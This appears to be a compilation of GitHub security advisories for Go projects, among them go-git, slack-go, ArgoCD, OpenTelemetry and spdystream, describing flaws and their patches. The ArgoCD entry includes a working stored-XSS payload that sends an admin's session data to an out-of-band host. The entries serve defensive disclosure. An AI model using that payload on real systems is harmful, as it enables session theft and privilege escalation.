GHSA-GM2X-2G9H-CCM8
Vulnerability from github – Published: 2026-03-30 17:05 – Updated: 2026-03-31 18:50Impact
go-git’s index decoder for format version 4 fails to validate the path name prefix length before applying it to the previously decoded path name. A maliciously crafted index file can trigger an out-of-bounds slice operation, resulting in a runtime panic during normal index parsing.
This issue only affects Git index format version 4. Earlier formats (go-git supports only v2 and v3) are not vulnerable to this issue.
An attacker able to supply a crafted .git/index file can cause applications using go-git to panic while reading the index. If the application does not recover from panics, this results in process termination, leading to a denial-of-service (DoS) condition.
Exploitation requires the ability to modify or inject a Git index file within the local repository in disk. This typically implies write access to the .git directory.
Patches
Users should upgrade to v5.17.1, or the latest v6 pseudo-version, in order to mitigate this vulnerability.
Credit
go-git maintainers thank @kq5y for finding and reporting this issue privately to the go-git project.

Vulnerability from github – Published: 2026-05-14 20:52 – Updated: 2026-06-29 15:38SecretsVerifier in slack-go/slack before v0.23.1 accepts an empty signing secret without error. If an application is misconfigured (e.g., an unset or empty SLACK_SIGNING_SECRET), NewSecretsVerifier builds an HMAC-SHA256 keyed with an empty string, allowing an unauthenticated attacker to forge a valid X-Slack-Signature and bypass Slack request authentication. Fixed in v0.23.1, which rejects empty secrets with ErrInvalidConfiguration. This is patched in version 0.23.1.

Vulnerability from github – Published: 2026-05-19 15:54 – Updated: 2026-05-19 15:54Summary
A user with application write access (developer role) can set link.argocd.argoproj.io/* annotations on any ArgoCD Application. These annotation values are rendered in the Summary tab's URLs section as elements without URL validation. Using the pipe-separator trick (Display Text | javascript:...), an attacker can inject a javascript: URI while displaying a legitimate-looking label (e.g. GitHub Repo). When a higher-privileged user (admin) clicks the link, arbitrary JavaScript executes in the ArgoCD origin context in the admin's authenticated session context, enabling API exfiltration and privilege escalation from developer to admin.
Details
Vulnerable sink: ui/src/app/applications/components/application-summary/application-summary.tsx:277
const parts = (url || '').split('|');
1 ? parts[1] : parts[0]} target='_blank'>
{parts[0]}

The annotation value is split on |. parts[0] becomes the visible link label; parts[1] becomes the href. No call to isValidURL() is made, unlike the protected ApplicationURLs component (application-urls.tsx:72,80) which does validate URLs and blocks javascript:. The target='_blank' opens a new tab that inherits the ArgoCD origin, giving the injected script same-origin fetch access to all ArgoCD APIs using the victim's authenticated session (credentialed fetch() calls).
Root cause: React 16.x does not block javascript: URIs in href attributes (this protection was added in React 19). The helper isValidURL() exists in shared/utils.ts but is not applied to this sink.
CSP: ArgoCD's default Content Security Policy is frame-ancestors 'self' only — no script-src, no connect-src, no default-src — providing zero XSS execution mitigation.
PoC
Prerequisites: Developer role with application write access (e.g. RBAC: p, role:developer, applications, *, */*, allow).
Step 1 — Set malicious annotation as developer:
kubectl annotate application <app-name> -n argocd \
'link.argocd.argoproj.io/docs=GitHub Repo|javascript:fetch("https://<argocd-host>/api/v1/session/userinfo",{credentials:"include"}).then(r=>r.json()).then(d=>fetch("https://xxx.oastify.com/?d="+btoa(JSON.stringify(d)),{mode:"no-cors"}))'
The URL section in the admin's Summary tab renders the link as "GitHub Repo" — the javascript: payload is invisible in the displayed text.
Step 2 — Admin opens Summary tab of the annotated application and clicks the link.
Step 3 — JavaScript executes at the ArgoCD origin and exfiltrates admin session data via out-of-band HTTP request. Tested with Burp Collaborator:
// Payload used during testing (Burp Collaborator OOB):
fetch("https://<argocd-host>/api/v1/session/userinfo", {credentials:"include"})
.then(r => r.json())
.then(d => fetch("https://xxx.oastify.com/?d=" + btoa(JSON.stringify(d)), {mode:"no-cors"}))
Step 4 — Burp Collaborator received the OOB HTTP interaction containing the base64-encoded admin session data. Decoded response:

Tested on: ArgoCD v3.3.8 (commit 0850e97), React 16.9.3.
Impact
- Stored XSS — payload persists in the Kubernetes Application resource until manually removed
- Privilege escalation — developer role → admin session hijacking via authenticated API calls
- Maximum stealth — the injected link displays as any attacker-chosen text; the
javascript:href is never visible to the victim - No server-side interaction required — purely client-side exploit, no network egress needed for execution (exfiltration uses
no-corsfetch, bypassed by absentconnect-srcCSP) - Any admin or operator who views the Summary tab of the compromised application is affected

GHSA-HFVC-G4FC-PQHX
Vulnerability from github – Published: 2026-04-08 19:22 – Updated: 2026-04-09 14:29Summary
The fix for GHSA-9h8m-3fm2-qjrq (CVE-2026-24051) changed the Darwin ioreg command to use an absolute path but left the BSD kenv command using a bare name, allowing the same PATH hijacking attack on BSD and Solaris platforms.
Root Cause
sdk/resource/host_id.go line 42:
if result, err := r.execCommand("kenv", "-q", "smbios.system.uuid"); err == nil {
Compare with the fixed Darwin path at line 58:
result, err := r.execCommand("/usr/sbin/ioreg", "-rd1", "-c", "IOPlatformExpertDevice")
The execCommand helper at sdk/resource/host_id_exec.go uses exec.Command(name, arg...) which searches $PATH when the command name contains no path separator.
Affected platforms (per build tag in host_id_bsd.go:4): DragonFly BSD, FreeBSD, NetBSD, OpenBSD, Solaris.
The kenv path is reached when /etc/hostid does not exist (line 38-40), which is common on FreeBSD systems.
Attack
- Attacker has local access to a system running a Go application that imports
go.opentelemetry.io/otel/sdk - Attacker places a malicious
kenvbinary earlier in$PATH - Application initializes OpenTelemetry resource detection at startup
hostIDReaderBSD.read()callsexec.Command("kenv", ...)which resolves to the malicious binary- Arbitrary code executes in the context of the application
Same attack vector and impact as CVE-2026-24051.
Suggested Fix
Use the absolute path:
if result, err := r.execCommand("/bin/kenv", "-q", "smbios.system.uuid"); err == nil {
On FreeBSD, kenv is located at /bin/kenv.

Vulnerability from github – Published: 2026-05-13 15:29 – Updated: 2026-06-09 10:50Impact
Multiple components may improperly handle crafted or malformed input, resulting in panics, infinite loops, uncontrolled recursion, or excessive resource consumption.
These issues arise from insufficient validation and missing safety mechanisms such as cycle detection, recursion limits, or defensive handling of unexpected states when processing untrusted repository data and filesystem structures.
Patches
Users should upgrade to a patched version in order to mitigate this vulnerability. Versions prior to v5 are likely to be affected, users are recommended to upgrade to a supported go-billy version.

Vulnerability from github – Published: 2026-05-19 15:21 – Updated: 2026-06-08 23:42Impact
go-git's SSH transport constructs the remote exec command by wrapping the repository path in single quotes without escaping single quotes embedded inside the path. This diverges from canonical Git, which shell-quotes the path through sq_quote_buf so that an embedded ' becomes the '\'' close-escape-reopen sequence and the whole path round-trips as a single quoted argument.
A repository path containing a single quote can therefore break out of the quoted region in the exec command and be appended as additional shell tokens. On SSH servers that evaluate the exec command through a shell (for example a user account whose login shell is /bin/sh or /bin/bash, or a ForceCommand wrapper that re-evaluates $SSH_ORIGINAL_COMMAND), those additional tokens execute in that account's command-execution context. SSH servers that tokenize the exec command without shell evaluation, including the canonical git-shell setup, are not affected.
The vulnerable behaviour is on the SSH server side, not in go-git: the same bytes can be produced by any SSH client. The change in go-git is defense-in-depth that restores parity with canonical Git's wire format and prevents go-git from being a vehicle for reaching shell-evaluating servers through attacker-influenced repository paths.
Patches
Users should upgrade to a patched version in order to mitigate this issue. The fix ports sq_quote_buf from canonical Git into go-git's SSH transport so that the wire output is byte-identical to what git itself would send for the same input.
Versions prior to v5 are likely to be affected, users are recommended to upgrade to a supported go-git version.

severity
HIGH (availability / remote request amplification)

vulnerability details
pins: open-telemetry/opentelemetry-go@1ee4a4126dbdd1bc79e9fae072fa488beffac52a as-of: 2026-02-04 policy: direct (no program scope provided)
callsite: propagation/baggage.go:58 (extractMultiBaggage)
attacker control: inbound HTTP request headers (many baggage field-values) → propagation.HeaderCarrier.Values("baggage") → repeated baggage.Parse + member aggregation
root cause
extractMultiBaggage iterates over all baggage header field-values and parses each one independently, then appends members into a shared slice. the 8192-byte parsing cap applies per header value, but the multi-value path repeats that work once per header line (bounded only by the server/proxy header byte limit).
impact
in a default net/http configuration (max header bytes 1mb), a single request with many baggage: header field-values can cause large per-request allocations and increased latency.
example from the attached PoC harness (darwin/arm64; 80 values; 40 requests):
- canonical:
per_req_alloc_bytes=10315458andp95_ms=7 - control:
per_req_alloc_bytes=133429andp95_ms=0
proof of concept
canonical:
mkdir -p poc
unzip poc.zip -d poc
cd poc
make test
output (excerpt):
[CALLSITE_HIT]: propagation/baggage.go:58 extractMultiBaggage
[PROOF_MARKER]: baggage_multi_value_amplification p95_ms=7 per_req_alloc_bytes=10315458 per_req_allocs=16165
control:
cd poc
make control
control output (excerpt):
[NC_MARKER]: baggage_single_value_baseline p95_ms=0 per_req_alloc_bytes=133429 per_req_allocs=480
expected: multiple baggage header field-values should be semantically equivalent to a single comma-joined baggage value and should not multiply parsing/alloc work within the effective header byte budget.
actual: multiple baggage header field-values trigger repeated parsing and member aggregation, causing high per-request allocations and increased latency even when each individual value is within 8192 bytes.
fix recommendation
avoid repeated parsing across multi-values by enforcing a global budget and/or normalizing multi-values into a single value before parsing. one mitigation approach is to treat multi-values as a single comma-joined string and cap total parsed bytes (for example 8192 bytes total).
fix accepted when: under the default PoC harness settings, canonical stays within 2x of control for per_req_alloc_bytes and per_req_allocs, and p95_ms stays below 2ms.

GHSA-PC3F-X583-G7J2
Vulnerability from github – Published: 2026-04-16 20:44 – Updated: 2026-06-08 23:36The SPDY/3 frame parser in spdystream does not validate
attacker-controlled counts and lengths before allocating memory. A
remote peer that can send SPDY frames to a service using spdystream can
cause the process to allocate gigabytes of memory with a small number of
malformed control frames, leading to an out-of-memory crash.
Three allocation paths in the receive side are affected:
1. SETTINGS entry count -- The SETTINGS frame reader reads a 32-bit
numSettings from the payload and allocates a slice of that size
without checking it against the declared frame length. An attacker
can set numSettings to a value far exceeding the actual payload,
triggering a large allocation before any setting data is read.
2. Header count -- parseHeaderValueBlock reads a 32-bit
numHeaders from the decompressed header block and allocates an
http.Header map of that size with no upper bound.
3. Header field size -- Individual header name and value lengths are
read as 32-bit integers and used directly as allocation sizes with
no validation.
Because SPDY header blocks are zlib-compressed, a small on-the-wire
payload can decompress into attacker-controlled bytes that the parser
interprets as 32-bit counts and lengths. A single crafted frame is
enough to exhaust process memory.
Impact
Any program that accepts SPDY connections using spdystream -- directly or through a dependent library -- is affected. A remote peer that can send SPDY frames to the service can crash the process with a single crafted SPDY control frame, causing denial of service.
Affected versions
github.com/moby/spdystream <= v0.5.0
Fix
v0.5.1 addresses the receive-side allocation bugs and adds related
hardening:
Core fixes:
- SETTINGS entry-count validation -- The SETTINGS frame reader now
checks that numSettings is consistent with the declared frame
length (numSettings <= (length-4)/8) before allocating.
- Header count limit -- parseHeaderValueBlock enforces a maximum
number of headers per frame (default: 1000).
- Header field size limit -- Individual header name and value
lengths are checked against a per-field size limit (default: 1 MiB)
before allocation.
- Connection closure on protocol error -- The connection read loop
now closes the underlying net.Conn when it encounters an
InvalidControlFrame error, preventing further exploitation on the
same connection.
Additional hardening:
- Write-side bounds checks -- All frame write methods now verify
that payloads fit within the 24-bit length field, preventing the
library from producing invalid frames.
Configurable limits:
- Callers can adjust the defaults using NewConnectionWithOptions or
the lower-level spdy.NewFramerWithOptions with functional options:
WithMaxControlFramePayloadSize, WithMaxHeaderFieldSize, and
WithMaxHeaderCount.
The SPDY/3 frame parser in spdystream does not validate
attacker-controlled counts and lengths before allocating memory. A
remote peer that can send SPDY frames to a service using spdystream can
cause the process to allocate gigabytes of memory with a small number of
malformed control frames, leading to an out-of-memory crash.

Three allocation paths in the receive side are affected:
1. **SETTINGS entry count** -- The SETTINGS frame reader reads a 32-bit
`numSettings` from the payload and allocates a slice of that size
without checking it against the declared frame length. An attacker
can set `numSettings` to a value far exceeding the actual payload,
triggering a large allocation before any setting data is read.

2. **Header count** -- `parseHeaderValueBlock` reads a 32-bit
`numHeaders` from the decompressed header block and allocates an
`http.Header` map of that size with no upper bound.

3. **Header field size** -- Individual header name and value lengths are
read as 32-bit integers and used directly as allocation sizes with
no validation.

Because SPDY header blocks are zlib-compressed, a small on-the-wire
payload can decompress into attacker-controlled bytes that the parser
interprets as 32-bit counts and lengths. A single crafted frame is
enough to exhaust process memory.
## Impact
Any program that accepts SPDY connections using spdystream -- directly
or through a dependent library -- is affected. A remote peer that can
send SPDY frames to the service can crash the process with a single
crafted SPDY control frame, causing denial of service.
## Affected versions
`github.com/moby/spdystream` <= v0.5.0
## Fix
v0.5.1 addresses the receive-side allocation bugs and adds related
hardening:

**Core fixes:**

- **SETTINGS entry-count validation** -- The SETTINGS frame reader now
checks that `numSettings` is consistent with the declared frame
length (`numSettings <= (length-4)/8`) before allocating.

- **Header count limit** -- `parseHeaderValueBlock` enforces a maximum
number of headers per frame (default: 1000).

- **Header field size limit** -- Individual header name and value
lengths are checked against a per-field size limit (default: 1 MiB)
before allocation.

- **Connection closure on protocol error** -- The connection read loop
now closes the underlying `net.Conn` when it encounters an
`InvalidControlFrame` error, preventing further exploitation on the
same connection.

**Additional hardening:**

- **Write-side bounds checks** -- All frame write methods now verify
that payloads fit within the 24-bit length field, preventing the
library from producing invalid frames.

**Configurable limits:**

- Callers can adjust the defaults using `NewConnectionWithOptions` or
the lower-level `spdy.NewFramerWithOptions` with functional options:
`WithMaxControlFramePayloadSize`, `WithMaxHeaderFieldSize`, and
`WithMaxHeaderCount`.
",

GHSA-QW64-3X98-G7Q2
Vulnerability from github – Published: 2026-05-14 18:25 – Updated: 2026-06-09 10:26Impact
Multiple path traversal issues exist across different components of go-billy. Insufficient path sanitization and boundary enforcement may allow crafted paths (e.g., using ..) to escape intended base directories.
While go-billy was not originally designed to provide a strong security boundary, some of these issues were inconsistent across some of the built-in implementations. This results in scenarios where applications relying on go-billy for some level of isolation may inadvertently expose access to unintended filesystem locations.
The osfs.ChrootOS implementation is notably affected by this vulnerability and is now deprecated in v5, removed at v6. Users are recommended to move on to osfs.BoundOS instead: osfs.New(path, WithBoundOS()).
Users requiring stronger security boundary enforcement are recommended to upgrade to v6, where the osfs implementation are backed by the traversal-resistant primitive os.Root.
Patches
Users should upgrade to a patched version in order to mitigate this vulnerability. Versions prior to v5 are likely to be affected, users are recommended to upgrade to a supported go-billy version.
